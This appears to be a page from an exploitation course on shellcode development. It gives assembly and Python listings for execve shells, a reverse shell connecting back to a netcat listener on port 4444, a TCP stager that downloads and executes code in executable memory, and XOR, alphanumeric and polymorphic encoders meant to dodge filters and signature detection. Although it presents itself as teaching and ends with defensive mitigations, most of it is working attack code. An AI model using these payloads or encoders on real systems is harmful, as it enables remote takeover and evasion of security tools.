Loading content...
In 1996, the first public examples of "shellcode" emerged—compact, self-contained machine code designed to spawn a command shell when executed. The name stuck: whether the payload downloads a file, establishes a network connection, or modifies system configuration, we still call it shellcode.
Code injection represents the culmination of a buffer overflow attack. Once an attacker controls the instruction pointer, they must provide something meaningful for the CPU to execute. Writing effective shellcode is a discipline that combines low-level assembly programming, deep understanding of OS internals, and creative problem-solving to work around constraints.
This page transforms you from understanding exploitation conceptually to understanding the payload itself—the bytes that make exploitation worthwhile.
By the end of this page, you will understand: how to write position-independent shellcode, system call mechanics for spawning shells and making network connections, encoding techniques to bypass character filters, polymorphic and metamorphic shellcode concepts, and the practical limitations of modern shellcode deployment.
Shellcode is machine code (raw CPU instructions) designed to execute arbitrary operations when injected into a running process. Unlike compiled programs, shellcode has unique constraints:
Position Independence: Shellcode doesn't know where in memory it will land. It cannot use absolute addresses for its own data or code. All references must be relative or computed at runtime.
Self-Containment: Shellcode typically cannot rely on external libraries being loaded at known addresses. It must make direct system calls or use carefully-located library functions.
Size Minimization: Smaller buffer = tighter space constraints. Every byte counts when you're working within a 64-byte or 128-byte overflow window.
Character Restrictions: Many vulnerabilities involve string functions that filter certain bytes. Shellcode must avoid or encode those bytes.
The term 'shellcode' originated because early payloads primarily spawned interactive shells (/bin/sh on Unix). Today, shellcode might exfiltrate data, establish persistent backdoors, mine cryptocurrency, or deliver ransomware—but the name persists as a historical artifact of the exploit development community.
Position-independent code (PIC) executes correctly regardless of where it's loaded in memory. This is essential for shellcode because we can't predict the exact address where our payload will land.
The Problem: Shellcode often needs to reference strings (like /bin/sh) or other data. Normal code uses absolute addresses, but we don't know our address.
The Solution: Multiple techniques exist to create position-independent references:
lea rax, [rip+offset] to get addresses relative to current instruction. Very clean on modern architectures.1234567891011121314151617181920212223242526272829303132333435
;; JMP-CALL-POP Technique for position-independent string reference;; This is the classic technique, works on all x86/x64 section .textglobal _start _start: jmp short get_string_addr ; Jump forward over data access code execute_shell: pop rdi ; Pop string address from stack ; (CALL pushed address of string) xor rsi, rsi ; argv = NULL xor rdx, rdx ; envp = NULL push 59 ; syscall number for execve pop rax ; Avoid null bytes in mov rax, 59 syscall ; Execute execve("/bin/sh", NULL, NULL) get_string_addr: call execute_shell ; CALL pushes address of next byte (the string) db "/bin/sh", 0 ; String data immediately after CALL ;; Assembled, this becomes approximately:;; eb 0e jmp short get_string_addr (+14 bytes);; 5f pop rdi;; 48 31 f6 xor rsi, rsi;; 48 31 d2 xor rdx, rdx ;; 6a 3b push 59;; 58 pop rax;; 0f 05 syscall;; e8 ed ff ff ff call execute_shell (-19 bytes);; 2f 62 69 6e 2f 73 68 00 "/bin/sh\0"12345678910111213141516171819202122232425262728
;; Stack-based string building (no JMP-CALL needed);; Push string onto stack, reference via RSP section .textglobal _start _start: xor rsi, rsi ; RSI = 0 (also serves as null terminator) push rsi ; Push null terminator onto stack ; Push "/bin//sh" (8 bytes, padded to avoid partial push) ; In little-endian: 0x68732f2f6e69622f mov rdi, 0x68732f2f6e69622f ; "/bin//sh" push rdi ; Push string onto stack mov rdi, rsp ; RDI = pointer to string on stack ; RSI already 0 (argv = NULL) xor rdx, rdx ; envp = NULL push 59 pop rax ; Syscall number (execve = 59) syscall ;; Key insight: The string "/bin//sh" is built on the stack;; Double slash is ignored by the shell, but gives us exactly 8 bytes;; No null bytes except the terminator pushed as 0Using '/bin//sh' instead of '/bin/sh' gives exactly 8 bytes—a convenient size for 64-bit register operations. Unix systems treat consecutive slashes as a single slash, so '/bin//sh' is equivalent to '/bin/sh'. This trick is ubiquitous in shellcode development.
Shellcode operates in user space but needs kernel services—spawning processes, opening network connections, reading files. On Linux, this is accomplished through system calls (syscalls).
System Call Invocation on Linux x86-64:
syscall instruction| Syscall | Number (x64) | Arguments | Purpose |
|---|---|---|---|
execve | 59 (0x3b) | rdi=path, rsi=argv, rdx=envp | Execute a program (spawn shell) |
read | 0 | rdi=fd, rsi=buf, rdx=count | Read from file descriptor |
write | 1 | rdi=fd, rsi=buf, rdx=count | Write to file descriptor |
open | 2 | rdi=path, rsi=flags, rdx=mode | Open a file |
socket | 41 | rdi=domain, rsi=type, rdx=proto | Create network socket |
connect | 42 | rdi=sockfd, rsi=addr, rdx=len | Connect to remote host |
dup2 | 33 | rdi=oldfd, rsi=newfd | Duplicate file descriptor |
mprotect | 10 | rdi=addr, rsi=len, rdx=prot | Change memory permissions |
fork | 57 | (none) | Create child process |
exit | 60 | rdi=status | Terminate process cleanly |
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566
;; Reverse Shell Shellcode for Linux x86-64;; Connects back to 127.0.0.1:4444 and spawns /bin/sh;; Attacker runs: nc -lvp 4444 section .textglobal _start _start: ;; Create socket: socket(AF_INET=2, SOCK_STREAM=1, 0) xor rdi, rdi push rdi ; Push 0 for socket() pop rsi ; RSI = 0 inc rsi ; RSI = 1 (SOCK_STREAM) push 2 pop rdi ; RDI = 2 (AF_INET) xor rdx, rdx ; RDX = 0 (protocol) push 41 pop rax ; syscall 41 = socket syscall mov r12, rax ; Save socket fd in R12 ;; Build sockaddr_in structure on stack ;; struct sockaddr_in { sin_family=2, sin_port=0x5c11 (4444), sin_addr=127.0.0.1 } xor rax, rax push rax ; sin_zero padding mov eax, 0x0100007f ; 127.0.0.1 in network byte order push rax ; sin_addr push word 0x5c11 ; port 4444 in network byte order push word 2 ; AF_INET mov rsi, rsp ; RSI = pointer to sockaddr_in ;; Connect: connect(sockfd, &sockaddr, 16) mov rdi, r12 ; Socket fd push 16 pop rdx ; Address length push 42 pop rax ; syscall 42 = connect syscall ;; Duplicate socket to stdin/stdout/stderr ;; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2) mov rdi, r12 ; Socket fd xor rsi, rsi ; Start with fd 0 (stdin) dup_loop: push 33 pop rax ; syscall 33 = dup2 syscall inc rsi cmp rsi, 3 jne dup_loop ;; Execute shell: execve("/bin/sh", NULL, NULL) xor rsi, rsi push rsi ; NULL terminator mov rdi, 0x68732f2f6e69622f ; "/bin//sh" push rdi mov rdi, rsp ; RDI = pointer to string xor rdx, rdx ; envp = NULL push 59 pop rax ; syscall 59 = execve syscallOn 32-bit Linux, syscalls use int 0x80 with arguments in EAX, EBX, ECX, EDX, ESI, EDI. On 64-bit, syscall instruction and different registers are used. Syscall numbers also differ between 32-bit and 64-bit. Always use the correct syscall table for your target architecture.
Bad characters are bytes that the vulnerability context corrupts, terminates, or filters. Common bad characters include:
\x00 (NULL) — Terminates strings in C\x0a (newline) — Terminates input for fgets, line-based protocols\x0d (carriage return) — Terminates input in some contexts\x20 (space) — May be treated as delimiter\x09 (tab) — May be treated as whitespace\xff — Sometimes filtered by UTF-8 validationThe specific bad characters depend on the vulnerability and input handling.
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283
#!/usr/bin/env python3"""XOR Encoder for ShellcodeEncodes shellcode to avoid specified bad charactersPrepends a decoder stub that runs first and decodes the payload""" def find_xor_key(shellcode: bytes, bad_chars: bytes) -> int: """Find an XOR key that, when applied, produces no bad characters.""" for key in range(1, 256): # Skip 0 as XOR with 0 is no-op encoded = bytes([b ^ key for b in shellcode]) if not any(c in bad_chars for c in encoded): # Also verify the key itself isn't a bad char (appears in decoder) if key not in bad_chars: return key raise ValueError("No valid XOR key found - try multi-byte encoding") def xor_encode(shellcode: bytes, key: int) -> bytes: """XOR encode shellcode with given key.""" return bytes([b ^ key for b in shellcode]) def generate_decoder_stub(key: int, length: int) -> bytes: """ Generate x86-64 decoder stub. This stub XOR-decodes the following payload in-place. """ # Decoder stub that decodes payload after itself # Uses JMP-CALL-POP to get address of encoded payload decoder = bytes([ 0xeb, 0x0d, # jmp short get_payload_addr # decode_loop: 0x5e, # pop rsi (address of encoded shellcode) 0x31, 0xc9, # xor ecx, ecx 0xb1, length, # mov cl, length # decode: 0x80, 0x36, key, # xor byte [rsi], key 0x46, # inc rsi (should be 0x48, 0xff, 0xc6 for 64-bit) 0xe2, 0xfa, # loop decode (-6) 0xeb, 0x05, # jmp short shellcode # get_payload_addr: 0xe8, 0xee, 0xff, 0xff, 0xff, # call decode_loop # Encoded shellcode follows here ]) return decoder # Example usageoriginal_shellcode = bytes([ 0x48, 0x31, 0xf6, # xor rsi, rsi 0x48, 0xbf, 0x2f, 0x62, 0x69, # mov rdi, '/bin//sh' 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x57, # push rdi 0x48, 0x89, 0xe7, # mov rdi, rsp 0x48, 0x31, 0xd2, # xor rdx, rdx 0xb0, 0x3b, # mov al, 59 0x0f, 0x05 # syscall]) bad_chars = b"\x00\x0a\x0d" print(f"Original shellcode: {len(original_shellcode)} bytes")print(f"Bad characters to avoid: {bad_chars.hex()}") # Find suitable keykey = find_xor_key(original_shellcode, bad_chars)print(f"XOR key found: 0x{key:02x}") # Encodeencoded = xor_encode(original_shellcode, key)print(f"Encoded shellcode: {encoded.hex()}") # Verify no bad charsfor c in encoded: if bytes([c]) in bad_chars: print(f"ERROR: Bad char 0x{c:02x} in encoded shellcode!") breakelse: print("✓ No bad characters in encoded payload") # Generate complete payload with decoderdecoder = generate_decoder_stub(key, len(original_shellcode))final_payload = decoder + encodedprint(f"Final payload: {len(final_payload)} bytes")print(f"Payload hex: {final_payload.hex()}")XOR-encoded shellcode works by prepending a small decoder stub. When execution reaches the payload, the decoder runs first, XORing each byte with the key to reveal the original shellcode, then jumps to execute it. The decoder itself must be null-free and avoid bad characters—this constrains decoder design.
Some vulnerability contexts are extremely restrictive, allowing only alphanumeric characters (A-Z, a-z, 0-9) or even narrower byte ranges. Additionally, signature-based detection systems may block known shellcode patterns. Advanced techniques address both challenges.
1234567891011121314151617181920212223
;; Alphanumeric-compatible instructions (x86);; These opcodes fall within A-Z, a-z, 0-9 ASCII ranges ;; Valid alphanumeric instructions include:;; push/pop certain registers: P (0x50) = push eax, X (0x58) = pop eax;; inc/dec: I = dec ecx (0x49), A = inc ecx (0x41), etc.;; xor reg,imm: 5 = xor eax,imm32 (0x35);; and reg,imm: % = and eax,imm32 (0x25) ;; Example: Building arbitrary value in EAX using only alphanumeric ops;; Goal: Put 0x99c0cd80 (int 0x80 + nop pattern) in EAX;; Approach: Use AND with two values that AND to 0, then XOR in target push eax ; P (0x50) - validand eax, 0x554e4d4a ; %JMN\U (valid alphanumeric)and eax, 0x2a313235 ; %125*1 (valid, with AND produces 0x00000000)xor eax, 0x39443143 ; 5C1D9 (valid alphanumeric);; Sequential XORs can build any 32-bit value ;; After building decoder in alphanumeric ops, decode and run real shellcode ;; Tools like alpha2 automatically generate these sequences;; Example: msfvenom -p linux/x86/shell_reverse_tcp ... -e x86/alpha_mixedPolymorphic Shellcode
Polymorphic shellcode changes its appearance on each generation while maintaining identical functionality. This defeats signature-based detection that looks for specific byte patterns.
How Polymorphism Works:
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889
#!/usr/bin/env python3"""Simple Polymorphic Shellcode GeneratorGenerates unique encoded variants of base shellcode""" import random def generate_polymorphic_variant(shellcode: bytes) -> bytes: """Generate a unique polymorphic variant of shellcode.""" # Random XOR key (avoid 0x00) key = random.randint(1, 255) # Encode shellcode encoded = bytes([b ^ key for b in shellcode]) # Generate decoder with random variations decoder = generate_varied_decoder(key, len(shellcode)) # Add random NOP sled variation nop_variants = [ b"\x90", # NOP b"\x40\x48", # inc eax; dec eax (null operation pair) b"\x87\xc0", # xchg eax, eax b"\x86\xc9", # xchg cl, cl ] nop_sled = b"" for _ in range(random.randint(8, 32)): nop_sled += random.choice(nop_variants) return nop_sled + decoder + encoded def generate_varied_decoder(key: int, length: int) -> bytes: """Generate decoder with random instruction choices.""" # Choose random register for loop counter (CL or BL) use_cl = random.choice([True, False]) if use_cl: # Version using CL set_counter = bytes([0x31, 0xc9, 0xb1, length]) # xor ecx,ecx; mov cl,len loop_inst = bytes([0xe2]) # loop else: # Version using BL (requires different loop logic) set_counter = bytes([0x31, 0xdb, 0xb3, length]) # xor ebx,ebx; mov bl,len loop_inst = bytes([0xfe, 0xcb, 0x75]) # dec bl; jnz # Random junk instructions to insert (no-ops that change signature) junk_options = [ b"", # No junk b"\x50\x58", # push eax; pop eax b"\x51\x59", # push ecx; pop ecx b"\x90", # nop ] junk = random.choice(junk_options) # Build decoder (simplified) decoder = bytes([ 0xeb, 0x0d + len(junk), # jmp to get_addr ]) + junk + bytes([ 0x5e, # pop rsi ]) + set_counter + bytes([ 0x80, 0x36, key, # xor byte [rsi], key 0x46, # inc rsi ]) + loop_inst + bytes([ 0xfa, # -6 offset 0xeb, 0x05, # jmp to shellcode 0xe8, # call ]) + bytes([ (0x100 - (0x12 + len(junk))) & 0xff, 0xff, 0xff, 0xff ]) return decoder # Generate multiple unique variants of same shellcodebase_shellcode = bytes([ 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80]) print("Generating 3 polymorphic variants:")for i in range(3): variant = generate_polymorphic_variant(base_shellcode) print(f"\nVariant {i+1}: {len(variant)} bytes") print(f" First 20 bytes: {variant[:20].hex()}") print(f" Hash: {hash(variant) & 0xffffffff:08x}")Beyond polymorphism lies metamorphic code, which actually rewrites its own logic (not just encoding) to generate functionally equivalent but structurally different variants. True metamorphic engines are complex but can evade behavioral analysis by varying the actual instruction sequences, not just their byte representations.
Real-world exploitation often faces severe size constraints. A buffer might only hold 80 bytes—far too small for sophisticated payloads like Meterpreter. Staged payloads solve this by splitting the attack into multiple phases.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960
;; Minimal TCP Stager (reverse connect, receive, execute);; Fits in approximately 75 bytes;; Connects to attacker, receives arbitrary code, executes it section .textglobal _start _start: ;; socket(AF_INET=2, SOCK_STREAM=1, 0) push 41 ; syscall: socket pop rax push 2 pop rdi ; AF_INET push 1 pop rsi ; SOCK_STREAM xor rdx, rdx ; 0 syscall mov r12, rax ; Save socket fd ;; Build sockaddr_in and connect push rdx ; 0 padding mov eax, 0x0100007f ; 127.0.0.1 push rax push word 0x5c11 ; Port 4444 push word 2 ; AF_INET push 42 ; syscall: connect pop rax mov rdi, r12 ; socket fd mov rsi, rsp ; sockaddr pointer push 16 pop rdx ; addrlen syscall ;; mmap executable memory for payload push 9 ; syscall: mmap pop rax xor rdi, rdi ; addr = NULL push 4096 pop rsi ; length push 7 ; PROT_READ|WRITE|EXEC pop rdx push 0x22 ; MAP_ANONYMOUS|PRIVATE pop r10 push 0xffffffffffffffff pop r8 ; fd = -1 xor r9, r9 ; offset = 0 syscall mov r13, rax ; Save mmap address ;; read(socket, mmap_addr, 4096) xor rax, rax ; syscall: read mov rdi, r12 ; socket fd mov rsi, r13 ; buffer (mmap) push 4096 pop rdx ; count syscall ;; Jump to received payload jmp r13Egghunter Technique
When you can inject a large payload into memory but only control a small buffer for the initial exploit, an egghunter bridges the gap:
w00tw00tEgghunters must handle:
Metasploit's payload system exemplifies staged architecture. Payloads like linux/x64/meterpreter/reverse_tcp are staged (small stager + full Meterpreter), while linux/x64/meterpreter_reverse_tcp is stageless (single large payload). Choose based on buffer size and operational requirements.
Modern operating systems and hardware have deployed multiple layers of defense that complicate shellcode execution. Understanding these challenges is essential for both offensive research and defensive awareness.
| Defense | Mechanism | Impact on Shellcode | Bypass Technique |
|---|---|---|---|
| DEP/NX | Data pages marked non-executable | Injected shellcode cannot run | ROP chains, ret2libc, calling mprotect |
| ASLR | Randomize library/stack addresses | Cannot predict where to return | Info leak, partial overwrite, brute force |
| Stack Canaries | Secret value before return address | Overflow detected before RET | Info leak canary, format string |
| CFI | Control flow integrity checks | Invalid jump targets blocked | CFI-compliant gadgets, fine-grained attacks |
| Sandboxing | Restrict available syscalls | Shellcode functionality limited | Use allowed syscalls, sandbox escape |
Each defense spawns bypass research; each bypass prompts stronger defenses. Modern exploitation often requires chaining multiple vulnerabilities: one for info leak, one for control flow, one for privilege escalation. Single-bug exploitation is increasingly rare against hardened targets.
We've explored the art and science of shellcode development—from fundamental position-independent code to advanced polymorphic and staged payloads. Let's consolidate the key insights.
What's Next: Return-Oriented Programming
The next page explores Return-Oriented Programming (ROP)—the dominant technique for exploiting systems with DEP enabled. When we can't execute injected code, we chain existing code fragments to achieve arbitrary computation without ever executing attacker-controlled bytes directly.
You now understand the fundamentals of shellcode development: position independence, system call mechanics, encoding techniques, and the constraints imposed by modern defenses. This knowledge is essential for understanding both vulnerability exploitation and the design of effective mitigations.